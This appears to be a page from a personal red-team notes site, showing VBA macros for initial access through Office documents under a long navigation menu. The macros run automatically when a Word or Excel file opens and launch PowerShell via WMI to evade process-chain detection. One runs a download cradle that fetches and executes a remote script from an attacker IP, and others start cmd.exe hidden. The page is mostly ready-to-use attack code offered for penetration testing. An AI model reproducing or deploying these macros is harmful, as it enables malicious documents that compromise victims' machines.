VulnableOne
  • 🧘‍♂️About Me
  • Offensive Treasure
    • 🧌Penetration Testing
      • Reconnaissance
        • Identify Ports/Hosts/Data
      • Enumeration
        • Service Ports
          • FTP (21)
          • SSH (22)
          • SMTP (25)
          • DNS (53)
          • TFTP (69/udp)
          • Finger (79)
          • SaMBa (139/445)
          • RPC/NFS (111/135)
          • SNMP (161/udp)
          • LDAP (389)
          • isakmp (500/udp)
          • Java (1099)
          • MS-SQL (1433)
          • MySQL (3306)
          • Distcc (3622)
          • PostgreSQL (5437)
          • Redis (6379)
      • Password Attack
        • Wordlist
        • Brute-Force
        • Crack Hash
      • File Transfer
        • Linux
        • Window
      • Misc
    • 🧙‍♂️AD Attack
      • Domain Enumeration
        • PowerView
        • AD-Module
        • Bloodhound
      • Abuse ACLs
        • GenericAll
        • GenericWrite
        • WriteDACL
        • ForceChangePassword
      • Kerberos Attack
        • Kerberoasting
        • ASREPRoasting
        • Unconstrained Delegation
        • Constrained Delegation
        • Resource Based Constrained Delegation
      • LAPs
      • MS SQL Servers
        • PowerUpSQL
        • SQL Server Management
        • Impacket-MSSQL
    • 🥷Red Team
      • Reconnaissance
        • Active Scanning
          • Scanning IP Blocks
          • Vulnerability Scanning
          • Wordlist Scanning
        • Gather Victim Host Information
          • Software
        • Gather Victim Identity Information
          • Credentials
          • Email Addresses
        • Search Open Websites/Domains
          • Social Media
          • Search Engines
          • Code Repositories
        • Search Victim-Owned Websites
      • Resource Development
        • C2 Infrastructure
        • Metasploit
      • Execution
        • Bash - Reverse Shell
        • HTA
        • JScript Dropper
        • Macro
        • Metasploit
        • Network Tools
        • Powershell
        • Python
        • VBA
        • Web Shell
        • WSH
      • Persistence
        • Logon Script
        • Startup Folder
        • WinLogon (Elevated)
        • Run / RunOnce (Elevated)
        • Scheduled Tasks (Elevated )
      • Privilege Escalation
        • Windows
          • SeBackup / SeRestore
          • SeTakeOwnership
          • SeImpersonate / SeAssignPrimaryToken
          • UAC Bypass
          • AutoInstall Elevate
          • Unquoted Service Paths
          • Weak Service Permissions
          • Weak Service Binary Permissions
        • Linux
          • Escalation
      • Defense Evasion
        • Bypassing AV
          • Pack Shellcode
        • Security Control
          • CLM
          • AppLocker
        • Use Alternate Authentication Material
          • Pass The Hash
          • Over Pass The Hash
          • Extract Tickets
          • Pass The Ticket
        • Impersonate
      • Credential Access
        • Adversary-in-the-Middle
          • LLMNR/NBT-NS/MDNS Poisoning
          • Evil SSDP
        • OS Credential Dumping
          • Protected LSASS
          • Invoke-Mimikatz
          • Mimikatz.exe
          • Secretsdump
          • Meterpreter Kiwi
          • Registry
          • Shadow Copy
          • DCSync
        • Steal or Forge Kerberos Tickets
          • Silver Ticket
          • Golden Ticket
        • Steal Web Session Cookie
      • Lateral Movement
        • Remote Access
        • Pivoting
          • Linux
          • Window
    • Web Application
      • Basic Recon
  • Blog
    • 📝Empty!!!
  • Course Review
    • 👨‍🎓Cyber Security Courses Journey
      • PNPT Journey
      • OSCP Journey
        • 🚩CTF
          • Hack The Box
            • Linux Boxes
              • ✅Admirer (Easy)
              • ✅Bashed (Easy)
              • ✅Beep (Easy)
              • ✅Blocky (Easy)
              • ✅FriendZone (Easy)
              • ✅Irked (Easy)
              • ✅Lame (Easy)
              • ✅Mirai (Easy)
              • ✅Networked (Easy)
              • ✅Nibbles (Easy)
              • ✅OpenAdmin (Easy)
              • ✅Sense (Easy)
              • ✅Shocker (Easy)
              • ✅Sunday (Easy)
              • ✅Tabby (Easy)
              • ✅Traverxec (Easy)
              • ✅Valentine (Easy)
              • ✅Cronos (Medium)
              • ✅Haircut (Medium)
              • ✅Jarvis (Medium)
              • ✅Magic (Medium)
              • ✅Nineveh (Medium)
              • ✅Node (Medium)
              • ✅Poison (Medium)
              • ✅SolidState (Medium)
              • ✅TartarSauce (Medium)
            • Window Boxes
              • ✅Arctic (Easy)
              • ✅Active (Easy)
              • ✅Blue (Easy)
              • ✅Bounty (Easy)
              • ✅Devel (Easy)
              • ✅Forest (Easy)
              • ✅Granny (Easy)
              • ✅Granpa (Easy)
              • ✅Jerry (Easy)
              • ✅Legacy (Easy)
              • ✅Optimum (Easy)
              • ✅Bastard (Medium)
              • ✅Silo (Medium)
          • Buffer Overflow
            • BOF - Tib3rius
            • BOF - TCM
              • 1- Spiking
              • 2- Fuzzing
              • 3- Finding Offset
              • 4- Overwriting EIP
              • 5- Finding Bad Characters
              • 6- Finding the Right Module
              • 7- Generating Shellcode
Powered by GitBook
On this page
  • WMI process creation to de-chain the PowerShell process.
  • Using the PowerShell shellcode runner
  • Simple Macro
  1. Offensive Treasure
  2. Red Team
  3. Execution

Macro

PreviousJScript DropperNextMetasploit

Last updated 1 year ago

WMI process creation to de-chain the PowerShell process.

Sub MyMacro()
  strArg = "powershell"
  GetObject("winmgmts:").Get("Win32_Process").Create strArg, Null, Null, pid
End Sub

Sub AutoOpen()
    MyMacro
End Sub

Using the PowerShell shellcode runner

We can update the PowerShell argument for the Create method to include the entire download cradle and dechaining with WMI.

Sub MyMacro
  strArg = "powershell -exec bypass -nop -c iex((new-object system.net.webclient).downloadstring('http://192.168.19.134/run.txt'))"
  GetObject("winmgmts:").Get("Win32_Process").Create strArg, Null, Null, pid
End Sub

Sub AutoOpen()
    Mymacro
End Sub

Simple Macro

'Word Document
Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

Sub MyMacro()
    Dim str As String
    str = "cmd.exe"
    Shell str, vbHide
End Sub

'Excel Document
Sub Workbook_open()
    MyMacro
End Sub

Private Sub Auto_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim str As String
    str = "cmd.exe"
    CreateObject("Wscript.Shell").Run str, 0
End Sub
🥷